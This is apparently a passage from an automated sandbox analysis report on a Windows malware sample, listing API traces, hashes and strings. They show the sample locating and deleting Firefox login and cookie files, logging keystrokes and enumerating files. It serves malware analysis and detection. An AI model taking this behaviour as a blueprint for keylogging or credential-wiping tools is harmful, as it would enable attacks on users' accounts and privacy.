                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040594F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040595C
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405968
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405971
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040597A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405994
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059A1
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059AD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059B6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059BF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D0
                              • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405ADF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AE8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AF1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                              • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 3561168790-1296180500
                              • Opcode ID: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                              • Instruction ID: 0f5345415a6924a010703aecf2afa4763ea68f99ba4dbc0389945dcd7f619004
                              • Opcode Fuzzy Hash: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                              • Instruction Fuzzy Hash: 15918F71A0014AAFDB10ABF0DC9D9EF7B79EB54304F048176E446A31A0EB7989C9CF58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,76EAA270), ref: 00403198
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,76EAA270), ref: 004031A7
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031B1
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031BB
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                              • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                              • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                              • wcscmp.MSVCRT ref: 00403247
                              • wcscmp.MSVCRT ref: 0040325F
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032D5
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004032E9
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 004032F8
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403302
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 0040330C
                              • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403324
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 0040334E
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403358
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403364
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00403393
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 004033A0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004033B0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004033BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033D6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033DF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033E8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033F4
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403401
                              • FindNextFileW.KERNEL32(000000FF,00000010), ref: 00403411
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403422
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040342B
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403434
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040343D
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040344F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403458
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403461
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040346A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$Hstd@@V?$basic_string@$??0?$basic_string@$?begin@?$basic_string@D@2@@0@FindV10@0@$FileG@2@@0@V01@@$?end@?$basic_string@D@1@@G@1@@NextV10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstV01@V10@@V12@
                              • String ID: filefound
                              • API String ID: 3774306600-2220344067
                              • Opcode ID: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                              • Instruction ID: 24ec99229332f1c5b72d1b304a02c10387bb8f3c273a52855c1da693c8ee490d
                              • Opcode Fuzzy Hash: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                              • Instruction Fuzzy Hash: 9281E37190010EABCB14DFA0DC9D9DE7B7CFB15305F1081B6F516A21A0EF789A89CB58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76F90F00,00000000), ref: 00405B0D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405B1A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00405B2C
                              • getenv.MSVCRT ref: 00405B38
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00405B44
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405B50
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B59
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B62
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?), ref: 00405B7C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00405B86
                              • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 00405B8D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00405B99
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00405BA7
                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 00405BCC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00405C6D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00405C7A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C8F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C98
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA1
                              • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA8
                              • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CB2
                              • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00405CC6
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CD4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CEB
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D00
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D09
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 830200565-432212279
                              • Opcode ID: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                              • Instruction ID: 9d0021f9074ca59868e7db579370f28baf2a5ec125cda6f041a2b5e7f9bf5000
                              • Opcode Fuzzy Hash: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                              • Instruction Fuzzy Hash: 7F61903190410AAFDB00AFB0DC5D9EEBB78EF15314F104576E542E2190EE799ACACF98
                              APIs
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,6A41AFB0,6A41AFB0), ref: 0040BCB1
                              • FindFirstFileW.KERNEL32(00000000), ref: 0040BCB8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopendir,00415268,?,00415268,00000000,?,?,?,?), ref: 0040BCEC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040BCF9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?), ref: 0040BD06
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD2E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD37
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BD10
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040BD4C
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,004107A8), ref: 0040BD65
                              • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040BD6C
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040BD79
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BD97
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDA1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDAA
                              • FindNextFileW.KERNEL32(?,?), ref: 0040BDC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BDD5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 0040BDE4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDF0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDF9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE02
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,fileslist,00415268,?,00415268,?), ref: 0040BE31
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040BE3E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040BE4B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040BE55
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE6A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE73
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE85
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE8E
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE97
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@$??0?$basic_string@G@2@@std@@V10@0@$D@1@@V01@@$?c_str@?$basic_string@$??4?$basic_string@?length@?$basic_string@FileFindV01@V10@@$??9std@@FirstG@1@@G@2@@0@Next
                              • String ID: P)?$err_notopendir$fileslist
                              • API String ID: 1112994111-4220216450
                              • Opcode ID: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                              • Instruction ID: 305903b0592b6c70fea0d48260eb7629651e495e35dfa161c8be6dc2ead5f216
                              • Opcode Fuzzy Hash: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                              • Instruction Fuzzy Hash: 7B51AE7290010EABCB04EBA0DD49DDE7B7CEF55305F044176F606E2190EF789A99CBA9
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,753DC0D0,?), ref: 00404677
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410854,?), ref: 00404C01
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410834,?,?,?,?,00000001), ref: 00404D53
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $s8@
                              • API String ID: 4257247948-2145460947
                              • Opcode ID: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                              • Instruction ID: 6621d6dcba6f39f3780b877212494eafe7300683ab97f71c5a1edef2570af96d
                              • Opcode Fuzzy Hash: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                              • Instruction Fuzzy Hash: 3F32C4E2608009BBEB04B5ACC996DFF763DD6C1340B50096BEA02B31C5F97A994456EB
                              APIs
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D54
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D72
